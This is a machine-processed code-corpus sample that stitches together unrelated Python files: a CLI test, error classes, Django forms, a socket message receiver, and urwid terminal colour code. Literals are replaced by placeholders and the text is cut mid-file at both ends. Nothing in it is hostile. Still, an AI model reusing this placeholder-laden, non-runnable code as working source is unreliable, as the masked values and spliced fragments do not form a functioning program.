        out = self.cli.show('<STR_LIT>')

    def test_set(self):
        self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        out = self.cli.set('<STR_LIT>', '<STR_LIT>')
        self.assertEqual(out.strip(), "<STR_LIT>")
        # show outputs a path to the program's YAML definition file.
        out = self.cli.show('<STR_LIT>', '<STR_LIT>')
        with open(out.strip()) as fd:
            data = yaml.load(fd)
        self.assertEqual(data['<STR_LIT:x>'], <NUM_LIT:1>)

    def test_start(self):
        self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        out = self.cli.start('<STR_LIT>', '<STR_LIT>')

    def test_log(self):
        self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        out = self.cli.start('<STR_LIT>', '<STR_LIT>')
        out = self.cli.log('<STR_LIT>')
        self.assertIn('<STR_LIT>', out)


if __name__ == "<STR_LIT:__main__>":
    unittest.main()
import sys

# This module only supports Python 3; bail out early otherwise.
if sys.version_info.major < 3:
    print("<STR_LIT>")
    exit()


class Error(Exception):
    """Base class for all application errors, carrying a message.

    Fix: the original __init__ never called Exception.__init__, leaving
    ``args`` empty, which breaks pickling and the default repr. The
    ``message`` attribute and ``__str__`` behavior are unchanged.
    """

    def __init__(self, message):
        # Populate Exception.args as well as the legacy `message` attribute.
        super().__init__(message)
        self.message = message

    def __str__(self):
        return repr(self.message)


# Specific error categories; their semantics are defined at the raise sites.
class ErrorConfig(Error):
    pass


class ErrorQuery(Error):
    pass


class ErrorQueryTimeout(Error):
    pass


class ErrorProfile(Error):
    pass


class ErrorLogin(Error):
    pass


class ErrorVerification(Error):
    pass


class ErrorEDDN(Error):
    pass


class ErrorLog(Error):
    pass
from django import forms

from .models import Order, Item


class OrderForm(forms.ModelForm):
    class Meta:
        model = Order
        fields = ['<STR_LIT:name>']

    def save(self, commit=True):
        """Save the order; when committing, set a flag and save a second time."""
        instance = super(OrderForm, self).save(commit=commit)
        if commit:
            # presumably consumed by model-level save logic -- confirm with
            # the Order model; the extra save() persists the flagged state.
            instance.action_on_save = True
            instance.save()
        return instance


class ItemForm(forms.ModelForm):
    # Extra non-model field, checked by default.
    flag = forms.BooleanField(initial=True)

    class Meta:
        model = Item
        fields = ['<STR_LIT:name>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:status>']


class AddressForm(forms.Form):
    name = forms.CharField(max_length=<NUM_LIT:255>, required=True)
    line1 = forms.CharField(max_length=<NUM_LIT:255>, required=False)
    line2 = forms.CharField(max_length=<NUM_LIT:255>, required=False)
    city = forms.CharField(max_length=<NUM_LIT:255>, required=False)
    postcode = forms.CharField(max_length=<NUM_LIT:10>, required=True)

    def __init__(self, *args, **kwargs):
        # A required `user` kwarg is stashed before normal form init;
        # omitting it raises KeyError.
        self.user = kwargs.pop('<STR_LIT:user>')
        super(AddressForm, self).__init__(*args, **kwargs)
<s> from threading import * <EOL> import socket <EOL> from . . constants import * <EOL> from . threadutils import * <EOL> from . . config import * <EOL> from struct import pack , unpack <EOL> import hashlib <EOL> class ReceiverThread ( Thread ) : <EOL> def __init__ ( self , config ) : <EOL> Thread . __init__ ( self ) <EOL> self . config = config <EOL> def setup ( self , sock ) : <EOL> self . sock = sock <EOL> self . data = b'<STR_LIT>' <EOL> def run ( self ) : <EOL> while True : <EOL> if isShutdownReady ( ) : <EOL> safePrint ( "<STR_LIT>" ) <EOL> break <EOL> dataLength = len ( self . data ) <EOL> try : <EOL> safePrint ( "<STR_LIT>" ) <EOL> self . data += self . sock . recv ( <NUM_LIT> ) <EOL> except socket . timeout : <EOL> safePrint ( "<STR_LIT>" ) <EOL> break <EOL> except Exception as err : <EOL> break <EOL> if len ( self . data ) == dataLength : <EOL> safePrint ( "<STR_LIT>" ) <EOL> break <EOL> else : <EOL> self . processData ( ) <EOL> def processData ( self ) : <EOL> if len ( self . data ) < <NUM_LIT:20> : <EOL> return <EOL> if self . data [ <NUM_LIT:0> : <NUM_LIT:4> ] != MESSAGE_MAGIC_BYTES : <EOL> safePrint ( "<STR_LIT>" ) <EOL> self . data = '<STR_LIT>' <EOL> return <EOL> command = self . data [ <NUM_LIT:4> : <NUM_LIT:12> ] . decode ( ) . rstrip ( "<STR_LIT:\x00>" ) <EOL> payloadLength = unpack ( '<STR_LIT>' , self . data [ <NUM_LIT:12> : <NUM_LIT:16> ] ) [ <NUM_LIT:0> ] <EOL> safePrint ( "<STR_LIT>" , payloadLength , "<STR_LIT>" ) <EOL> payload = self . data [ <NUM_LIT:20> : <NUM_LIT:20> + payloadLength ] <EOL> safePrint ( "<STR_LIT>" , payload ) <EOL> checksum = hashlib . sha512 ( payload ) . digest ( ) [ <NUM_LIT:0> : <NUM_LIT:4> ] <EOL> safePrint ( "<STR_LIT>" , checksum ) <EOL> if self . data [ <NUM_LIT:16> : <NUM_LIT:20> ] != checksum : <EOL> safePrint ( "<STR_LIT>" ) <EOL> self . data = self . data [ <NUM_LIT:20> + payloadLength : ] <EOL> self . processData ( ) <EOL> return <EOL> if command == '<STR_LIT>' : <EOL> self . 
recVersion ( payload ) <EOL> elif command == '<STR_LIT>' : <EOL> self . recVerack ( ) <EOL> def recVersion ( self , payload ) : <EOL> payload = payload . decode ( ) <EOL> safePrint ( "<STR_LIT>" , payload ) <EOL> if ( payload == VERSION ) : <EOL> with responseMessagesLock : <EOL> responseMessages . append ( getCommandString ( '<STR_LIT>' , self . config ) ) <EOL> def recVerack ( self ) : <EOL> safePrint ( "<STR_LIT>" ) </s>
<s> import os <EOL> import sys <EOL> import termios <EOL> from urwid . util import int_scale <EOL> from urwid import signals <EOL> from urwid . compat import B , bytes3 <EOL> UNPRINTABLE_TRANS_TABLE = B ( "<STR_LIT:?>" ) * <NUM_LIT:32> + bytes3 ( range ( <NUM_LIT:32> , <NUM_LIT> ) ) <EOL> UPDATE_PALETTE_ENTRY = "<STR_LIT>" <EOL> INPUT_DESCRIPTORS_CHANGED = "<STR_LIT>" <EOL> _BASIC_START = <NUM_LIT:0> <EOL> _CUBE_START = <NUM_LIT:16> <EOL> _CUBE_SIZE_256 = <NUM_LIT:6> <EOL> _GRAY_SIZE_256 = <NUM_LIT> <EOL> _GRAY_START_256 = _CUBE_SIZE_256 ** <NUM_LIT:3> + _CUBE_START <EOL> _CUBE_WHITE_256 = _GRAY_START_256 - <NUM_LIT:1> <EOL> _CUBE_SIZE_88 = <NUM_LIT:4> <EOL> _GRAY_SIZE_88 = <NUM_LIT:8> <EOL> _GRAY_START_88 = _CUBE_SIZE_88 ** <NUM_LIT:3> + _CUBE_START <EOL> _CUBE_WHITE_88 = _GRAY_START_88 - <NUM_LIT:1> <EOL> _CUBE_BLACK = _CUBE_START <EOL> _CUBE_STEPS_256 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _GRAY_STEPS_256 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _CUBE_STEPS_88 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _GRAY_STEPS_88 = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> _BASIC_COLOR_VALUES = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) , ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) , ( 
<NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:255> ) , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:255> ) , ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) ] <EOL> _COLOR_VALUES_256 = ( _BASIC_COLOR_VALUES + <EOL> [ ( r , g , b ) for r in _CUBE_STEPS_256 for g in _CUBE_STEPS_256 <EOL> for b in _CUBE_STEPS_256 ] + <EOL> [ ( gr , gr , gr ) for gr in _GRAY_STEPS_256 ] ) <EOL> _COLOR_VALUES_88 = ( _BASIC_COLOR_VALUES + <EOL> [ ( r , g , b ) for r in _CUBE_STEPS_88 for g in _CUBE_STEPS_88 <EOL> for b in _CUBE_STEPS_88 ] + <EOL> [ ( gr , gr , gr ) for gr in _GRAY_STEPS_88 ] ) <EOL> assert len ( _COLOR_VALUES_256 ) == <NUM_LIT> <EOL> assert len ( _COLOR_VALUES_88 ) == <NUM_LIT> <EOL> _FG_COLOR_MASK = <NUM_LIT> <EOL> _BG_COLOR_MASK = <NUM_LIT> <EOL> _FG_BASIC_COLOR = <NUM_LIT> <EOL> _FG_HIGH_COLOR = <NUM_LIT> <EOL> _BG_BASIC_COLOR = <NUM_LIT> <EOL> _BG_HIGH_COLOR = <NUM_LIT> <EOL> _BG_SHIFT = <NUM_LIT:8> <EOL> _HIGH_88_COLOR = <NUM_LIT> <EOL> _STANDOUT = <NUM_LIT> <EOL> _UNDERLINE = <NUM_LIT> <EOL> _BOLD = <NUM_LIT> <EOL> _BLINK = <NUM_LIT> <EOL> _FG_MASK = ( _FG_COLOR_MASK | _FG_BASIC_COLOR | _FG_HIGH_COLOR | <EOL> _STANDOUT | _UNDERLINE | _BLINK | _BOLD ) <EOL> _BG_MASK = _BG_COLOR_MASK | _BG_BASIC_COLOR | _BG_HIGH_COLOR <EOL> DEFAULT = '<STR_LIT:default>' <EOL> BLACK = '<STR_LIT>' <EOL> DARK_RED = '<STR_LIT>' <EOL> DARK_GREEN = '<STR_LIT>' <EOL> BROWN = '<STR_LIT>' <EOL> DARK_BLUE = '<STR_LIT>' <EOL> DARK_MAGENTA = '<STR_LIT>' <EOL> DARK_CYAN = '<STR_LIT>' <EOL> LIGHT_GRAY = '<STR_LIT>' <EOL> DARK_GRAY = '<STR_LIT>' <EOL> LIGHT_RED = '<STR_LIT>' <EOL> LIGHT_GREEN = '<STR_LIT>' <EOL> YELLOW = '<STR_LIT>' <EOL> LIGHT_BLUE = '<STR_LIT>' <EOL> LIGHT_MAGENTA = '<STR_LIT>' <EOL> LIGHT_CYAN = '<STR_LIT>' <EOL> WHITE = '<STR_LIT>' <EOL> _BASIC_COLORS = [ <EOL> BLACK , <EOL> DARK_RED , <EOL> DARK_GREEN , <EOL> BROWN , <EOL> DARK_BLUE , <EOL> DARK_MAGENTA , <EOL> DARK_CYAN , <EOL> LIGHT_GRAY , 
<EOL> DARK_GRAY , <EOL> LIGHT_RED , <EOL> LIGHT_GREEN , <EOL> YELLOW , <EOL> LIGHT_BLUE , <EOL> LIGHT_MAGENTA , <EOL> LIGHT_CYAN , <EOL> WHITE , <EOL> ] <EOL> _ATTRIBUTES = { <EOL> '<STR_LIT>' : _BOLD , <EOL> '<STR_LIT>' : _UNDERLINE , <EOL> '<STR_LIT>' : _BLINK , <EOL> '<STR_LIT>' : _STANDOUT , <EOL> } <EOL> def _value_lookup_table ( values , size ) : <EOL> """<STR_LIT>""" <EOL> middle_values = [ <NUM_LIT:0> ] + [ ( values [ i ] + values [ i + <NUM_LIT:1> ] + <NUM_LIT:1> ) // <NUM_LIT:2> <EOL> for i in range ( len ( values ) - <NUM_LIT:1> ) ] + [ size ] <EOL> lookup_table = [ ] <EOL> for i in range ( len ( middle_values ) - <NUM_LIT:1> ) : <EOL> count = middle_values [ i + <NUM_LIT:1> ] - middle_values [ i ] <EOL> lookup_table . extend ( [ i ] * count ) <EOL> return lookup_table <EOL> _CUBE_256_LOOKUP = _value_lookup_table ( _CUBE_STEPS_256 , <NUM_LIT> ) <EOL> _GRAY_256_LOOKUP = _value_lookup_table ( [ <NUM_LIT:0> ] + _GRAY_STEPS_256 + [ <NUM_LIT> ] , <NUM_LIT> ) <EOL> _CUBE_88_LOOKUP = _value_lookup_table ( _CUBE_STEPS_88 , <NUM_LIT> ) <EOL> _GRAY_88_LOOKUP = _value_lookup_table ( [ <NUM_LIT:0> ] + _GRAY_STEPS_88 + [ <NUM_LIT> ] , <NUM_LIT> ) <EOL> _CUBE_STEPS_256_16 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _CUBE_STEPS_256 ] <EOL> _GRAY_STEPS_256_101 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _GRAY_STEPS_256 ] <EOL> _CUBE_STEPS_88_16 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _CUBE_STEPS_88 ] <EOL> _GRAY_STEPS_88_101 = [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) for n in _GRAY_STEPS_88 ] <EOL> _CUBE_256_LOOKUP_16 = [ _CUBE_256_LOOKUP [ int_scale ( n , <NUM_LIT:16> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT:16> ) ] <EOL> _GRAY_256_LOOKUP_101 = [ _GRAY_256_LOOKUP [ int_scale ( n , <NUM_LIT> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT> ) ] <EOL> _CUBE_88_LOOKUP_16 = [ _CUBE_88_LOOKUP [ int_scale ( n , <NUM_LIT:16> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT:16> ) ] <EOL> _GRAY_88_LOOKUP_101 = [ _GRAY_88_LOOKUP [ int_scale ( 
n , <NUM_LIT> , <NUM_LIT> ) ] <EOL> for n in range ( <NUM_LIT> ) ] <EOL> def _gray_num_256 ( gnum ) : <EOL> """<STR_LIT>""" <EOL> gnum -= <NUM_LIT:1> <EOL> if gnum < <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> if gnum >= _GRAY_SIZE_256 : <EOL> return _CUBE_WHITE_256 <EOL> return _GRAY_START_256 + gnum <EOL> def _gray_num_88 ( gnum ) : <EOL> """<STR_LIT>""" <EOL> gnum -= <NUM_LIT:1> <EOL> if gnum < <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> if gnum >= _GRAY_SIZE_88 : <EOL> return _CUBE_WHITE_88 <EOL> return _GRAY_START_88 + gnum <EOL> def _color_desc_256 ( num ) : <EOL> """<STR_LIT>""" <EOL> assert num >= <NUM_LIT:0> and num < <NUM_LIT> , num <EOL> if num < _CUBE_START : <EOL> return '<STR_LIT>' % num <EOL> if num < _GRAY_START_256 : <EOL> num -= _CUBE_START <EOL> b , num = num % _CUBE_SIZE_256 , num // _CUBE_SIZE_256 <EOL> g , num = num % _CUBE_SIZE_256 , num // _CUBE_SIZE_256 <EOL> r = num % _CUBE_SIZE_256 <EOL> return '<STR_LIT>' % ( _CUBE_STEPS_256_16 [ r ] , _CUBE_STEPS_256_16 [ g ] , <EOL> _CUBE_STEPS_256_16 [ b ] ) <EOL> return '<STR_LIT>' % _GRAY_STEPS_256_101 [ num - _GRAY_START_256 ] <EOL> def _color_desc_88 ( num ) : <EOL> """<STR_LIT>""" <EOL> assert num > <NUM_LIT:0> and num < <NUM_LIT> <EOL> if num < _CUBE_START : <EOL> return '<STR_LIT>' % num <EOL> if num < _GRAY_START_88 : <EOL> num -= _CUBE_START <EOL> b , num = num % _CUBE_SIZE_88 , num // _CUBE_SIZE_88 <EOL> g , r = num % _CUBE_SIZE_88 , num // _CUBE_SIZE_88 <EOL> return '<STR_LIT>' % ( _CUBE_STEPS_88_16 [ r ] , _CUBE_STEPS_88_16 [ g ] , <EOL> _CUBE_STEPS_88_16 [ b ] ) <EOL> return '<STR_LIT>' % _GRAY_STEPS_88_101 [ num - _GRAY_START_88 ] <EOL> def _parse_color_256 ( desc ) : <EOL> """<STR_LIT>""" <EOL> if len ( desc ) > <NUM_LIT:4> : <EOL> return None <EOL> try : <EOL> if desc . startswith ( '<STR_LIT:h>' ) : <EOL> num = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if num < <NUM_LIT:0> or num > <NUM_LIT:255> : <EOL> return None <EOL> return num <EOL> if desc . 
startswith ( '<STR_LIT:#>' ) and len ( desc ) == <NUM_LIT:4> : <EOL> rgb = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:16> ) <EOL> if rgb < <NUM_LIT:0> : <EOL> return None <EOL> b , rgb = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> g , r = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> r = _CUBE_256_LOOKUP_16 [ r ] <EOL> g = _CUBE_256_LOOKUP_16 [ g ] <EOL> b = _CUBE_256_LOOKUP_16 [ b ] <EOL> return _CUBE_START + ( r * _CUBE_SIZE_256 + g ) * _CUBE_SIZE_256 + b <EOL> if desc . startswith ( '<STR_LIT>' ) : <EOL> gray = int ( desc [ <NUM_LIT:2> : ] , <NUM_LIT:16> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:255> : <EOL> return None <EOL> gray = _GRAY_256_LOOKUP [ gray ] <EOL> elif desc . startswith ( '<STR_LIT:g>' ) : <EOL> gray = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:100> : <EOL> return None <EOL> gray = _GRAY_256_LOOKUP_101 [ gray ] <EOL> else : <EOL> return None <EOL> if gray == <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> gray -= <NUM_LIT:1> <EOL> if gray == _GRAY_SIZE_256 : <EOL> return _CUBE_WHITE_256 <EOL> return _GRAY_START_256 + gray <EOL> except ValueError : <EOL> return None <EOL> def _parse_color_88 ( desc ) : <EOL> """<STR_LIT>""" <EOL> if len ( desc ) > <NUM_LIT:4> : <EOL> return None <EOL> try : <EOL> if desc . startswith ( '<STR_LIT:h>' ) : <EOL> num = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if num < <NUM_LIT:0> or num > <NUM_LIT> : <EOL> return None <EOL> return num <EOL> if desc . startswith ( '<STR_LIT:#>' ) and len ( desc ) == <NUM_LIT:4> : <EOL> rgb = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:16> ) <EOL> if rgb < <NUM_LIT:0> : <EOL> return None <EOL> b , rgb = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> g , r = rgb % <NUM_LIT:16> , rgb // <NUM_LIT:16> <EOL> r = _CUBE_88_LOOKUP_16 [ r ] <EOL> g = _CUBE_88_LOOKUP_16 [ g ] <EOL> b = _CUBE_88_LOOKUP_16 [ b ] <EOL> return _CUBE_START + ( r * _CUBE_SIZE_88 + g ) * _CUBE_SIZE_88 + b <EOL> if desc . 
startswith ( '<STR_LIT>' ) : <EOL> gray = int ( desc [ <NUM_LIT:2> : ] , <NUM_LIT:16> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:255> : <EOL> return None <EOL> gray = _GRAY_88_LOOKUP [ gray ] <EOL> elif desc . startswith ( '<STR_LIT:g>' ) : <EOL> gray = int ( desc [ <NUM_LIT:1> : ] , <NUM_LIT:10> ) <EOL> if gray < <NUM_LIT:0> or gray > <NUM_LIT:100> : <EOL> return None <EOL> gray = _GRAY_88_LOOKUP_101 [ gray ] <EOL> else : <EOL> return None <EOL> if gray == <NUM_LIT:0> : <EOL> return _CUBE_BLACK <EOL> gray -= <NUM_LIT:1> <EOL> if gray == _GRAY_SIZE_88 : <EOL> return _CUBE_WHITE_88 <EOL> return _GRAY_START_88 + gray <EOL> except ValueError : <EOL> return None <EOL> class AttrSpecError ( Exception ) : <EOL> pass <EOL> class AttrSpec ( object ) : <EOL> def __init__ ( self , fg , bg , colors = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if colors not in ( <NUM_LIT:1> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> ) : <EOL> raise AttrSpecError ( '<STR_LIT>' % colors ) <EOL> self . _value = <NUM_LIT:0> | _HIGH_88_COLOR * ( colors == <NUM_LIT> ) <EOL> self . foreground = fg <EOL> self . background = bg <EOL> if self . colors > colors : <EOL> raise AttrSpecError ( ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) % <EOL> ( repr ( fg ) , repr ( bg ) , colors ) ) <EOL> foreground_basic = property ( lambda s : s . _value & _FG_BASIC_COLOR != <NUM_LIT:0> ) <EOL> foreground_high = property ( lambda s : s . _value & _FG_HIGH_COLOR != <NUM_LIT:0> ) <EOL> foreground_number = property ( lambda s : s . _value & _FG_COLOR_MASK ) <EOL> background_basic = property ( lambda s : s . _value & _BG_BASIC_COLOR != <NUM_LIT:0> ) <EOL> background_high = property ( lambda s : s . _value & _BG_HIGH_COLOR != <NUM_LIT:0> ) <EOL> background_number = property ( lambda s : ( s . _value & _BG_COLOR_MASK ) <EOL> >> _BG_SHIFT ) <EOL> bold = property ( lambda s : s . _value & _BOLD != <NUM_LIT:0> ) <EOL> underline = property ( lambda s : s . _value & _UNDERLINE != <NUM_LIT:0> ) <EOL> blink = property ( lambda s : s . 
_value & _BLINK != <NUM_LIT:0> ) <EOL> standout = property ( lambda s : s . _value & _STANDOUT != <NUM_LIT:0> ) <EOL> def _colors ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _value & _HIGH_88_COLOR : <EOL> return <NUM_LIT> <EOL> if self . _value & ( _BG_HIGH_COLOR | _FG_HIGH_COLOR ) : <EOL> return <NUM_LIT> <EOL> if self . _value & ( _BG_BASIC_COLOR | _BG_BASIC_COLOR ) : <EOL> return <NUM_LIT:16> <EOL> return <NUM_LIT:1> <EOL> colors = property ( _colors ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> args = "<STR_LIT>" % ( self . foreground , self . background ) <EOL> if self . colors == <NUM_LIT> : <EOL> args = args + "<STR_LIT>" <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , args ) <EOL> def _foreground_color ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . foreground_basic or self . foreground_high ) : <EOL> return '<STR_LIT:default>' <EOL> if self . foreground_basic : <EOL> return _BASIC_COLORS [ self . foreground_number ] <EOL> if self . colors == <NUM_LIT> : <EOL> return _color_desc_88 ( self . foreground_number ) <EOL> return _color_desc_256 ( self . foreground_number ) <EOL> def _foreground ( self ) : <EOL> return ( self . _foreground_color ( ) + <EOL> '<STR_LIT>' * self . bold + '<STR_LIT>' * self . standout + <EOL> '<STR_LIT>' * self . blink + '<STR_LIT>' * self . underline ) <EOL> def _set_foreground ( self , foreground ) : <EOL> color = None <EOL> flags = <NUM_LIT:0> <EOL> for part in foreground . split ( '<STR_LIT:U+002C>' ) : <EOL> part = part . strip ( ) <EOL> if part in _ATTRIBUTES : <EOL> if flags & _ATTRIBUTES [ part ] : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( part ) , <EOL> repr ( foreground ) ) ) <EOL> flags |= _ATTRIBUTES [ part ] <EOL> continue <EOL> if part in ( '<STR_LIT>' , '<STR_LIT:default>' ) : <EOL> scolor = <NUM_LIT:0> <EOL> elif part in _BASIC_COLORS : <EOL> scolor = _BASIC_COLORS . index ( part ) <EOL> flags |= _FG_BASIC_COLOR <EOL> elif self . 
_value & _HIGH_88_COLOR : <EOL> scolor = _parse_color_88 ( part ) <EOL> flags |= _FG_HIGH_COLOR <EOL> else : <EOL> scolor = _parse_color_256 ( part ) <EOL> flags |= _FG_HIGH_COLOR <EOL> if scolor is None : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( part ) , repr ( foreground ) ) ) <EOL> if color is not None : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( foreground ) , ) ) <EOL> color = scolor <EOL> if color is None : <EOL> color = <NUM_LIT:0> <EOL> self . _value = ( self . _value & ~ _FG_MASK ) | color | flags <EOL> foreground = property ( _foreground , _set_foreground ) <EOL> def _background ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . background_basic or self . background_high ) : <EOL> return '<STR_LIT:default>' <EOL> if self . background_basic : <EOL> return _BASIC_COLORS [ self . background_number ] <EOL> if self . _value & _HIGH_88_COLOR : <EOL> return _color_desc_88 ( self . background_number ) <EOL> return _color_desc_256 ( self . background_number ) <EOL> def _set_background ( self , background ) : <EOL> flags = <NUM_LIT:0> <EOL> if background in ( '<STR_LIT>' , '<STR_LIT:default>' ) : <EOL> color = <NUM_LIT:0> <EOL> elif background in _BASIC_COLORS : <EOL> color = _BASIC_COLORS . index ( background ) <EOL> flags |= _BG_BASIC_COLOR <EOL> elif self . _value & _HIGH_88_COLOR : <EOL> color = _parse_color_88 ( background ) <EOL> flags |= _BG_HIGH_COLOR <EOL> else : <EOL> color = _parse_color_256 ( background ) <EOL> flags |= _BG_HIGH_COLOR <EOL> if color is None : <EOL> raise AttrSpecError ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % ( repr ( background ) , ) ) <EOL> self . _value = ( self . _value & ~ _BG_MASK ) | ( color << _BG_SHIFT ) | flags <EOL> background = property ( _background , _set_background ) <EOL> def get_rgb_values ( self ) : <EOL> """<STR_LIT>""" <EOL> if not ( self . foreground_basic or self . foreground_high ) : <EOL> vals = ( None , None , None ) <EOL> elif self . 
colors == <NUM_LIT> : <EOL> assert self . foreground_number < <NUM_LIT> , "<STR_LIT>" <EOL> vals = _COLOR_VALUES_88 [ self . foreground_number ] <EOL> else : <EOL> vals = _COLOR_VALUES_256 [ self . foreground_number ] <EOL> if not ( self . background_basic or self . background_high ) : <EOL> return vals + ( None , None , None ) <EOL> elif self . colors == <NUM_LIT> : <EOL> assert self . background_number < <NUM_LIT> , "<STR_LIT>" <EOL> return vals + _COLOR_VALUES_88 [ self . background_number ] <EOL> else : <EOL> return vals + _COLOR_VALUES_256 [ self . background_number ] <EOL> class RealTerminal ( object ) : <EOL> def __init__ ( self ) : <EOL> super ( RealTerminal , self ) . __init__ ( ) <EOL> self . _signal_keys_set = False <EOL> self . _old_signal_keys = None <EOL> def tty_signal_keys ( self , intr = None , quit = None , start = None , <EOL> stop = None , susp = None , fileno = None ) : <EOL> """<STR_LIT>""" <EOL> if fileno is None : <EOL> fileno = sys . stdin . fileno ( ) <EOL> if not os . isatty ( fileno ) : <EOL> return <EOL> tattr = termios . tcgetattr ( fileno ) <EOL> sattr = tattr [ <NUM_LIT:6> ] <EOL> skeys = ( sattr [ termios . VINTR ] , sattr [ termios . VQUIT ] , <EOL> sattr [ termios . VSTART ] , sattr [ termios . VSTOP ] , <EOL> sattr [ termios . VSUSP ] ) <EOL> if intr == '<STR_LIT>' : intr = <NUM_LIT:0> <EOL> if quit == '<STR_LIT>' : quit = <NUM_LIT:0> <EOL> if start == '<STR_LIT>' : start = <NUM_LIT:0> <EOL> if stop == '<STR_LIT>' : stop = <NUM_LIT:0> <EOL> if susp == '<STR_LIT>' : susp = <NUM_LIT:0> <EOL> if intr is not None : tattr [ <NUM_LIT:6> ] [ termios . VINTR ] = intr <EOL> if quit is not None : tattr [ <NUM_LIT:6> ] [ termios . VQUIT ] = quit <EOL> if start is not None : tattr [ <NUM_LIT:6> ] [ termios . VSTART ] = start <EOL> if stop is not None : tattr [ <NUM_LIT:6> ] [ termios . VSTOP ] = stop <EOL> if susp is not None : tattr [ <NUM_LIT:6> ] [ termios . 
VSUSP ] = susp <EOL> if intr is not None or quit is not None or start is not None or stop is not None or susp is not None : <EOL> termios . tcsetattr ( fileno , termios . TCSADRAIN , tattr ) <EOL> self . _signal_keys_set = True <EOL> return skeys <EOL> class ScreenError ( Exception ) : <EOL> pass <EOL> class BaseScreen ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = signals . MetaSignals <EOL> signals = [ UPDATE_PALETTE_ENTRY , INPUT_DESCRIPTORS_CHANGED ] <EOL> def __init__ ( self ) : <EOL> super ( BaseScreen , self ) . __init__ ( ) <EOL> self . _palette = { } <EOL> self . _started = False <EOL> started = property ( lambda self : self . _started ) <EOL> def start ( self ) : <EOL> self . _started = True <EOL> def stop ( self ) : <EOL> self . _started = False <EOL> def register_palette ( self , palette ) : <EOL> """<STR_LIT>""" <EOL> for item in palette : <EOL> if len ( item ) in ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:6> ) : <EOL> self . register_palette_entry ( * item ) <EOL> continue <EOL> if len ( item ) != <NUM_LIT:2> : <EOL> raise ScreenError ( "<STR_LIT>" % <EOL> repr ( item ) ) <EOL> name , like_name = item <EOL> if not self . _palette . has_key ( like_name ) : <EOL> raise ScreenError ( "<STR_LIT>" % like_name ) <EOL> self . _palette [ name ] = self . _palette [ like_name ] <EOL> def register_palette_entry ( self , name , 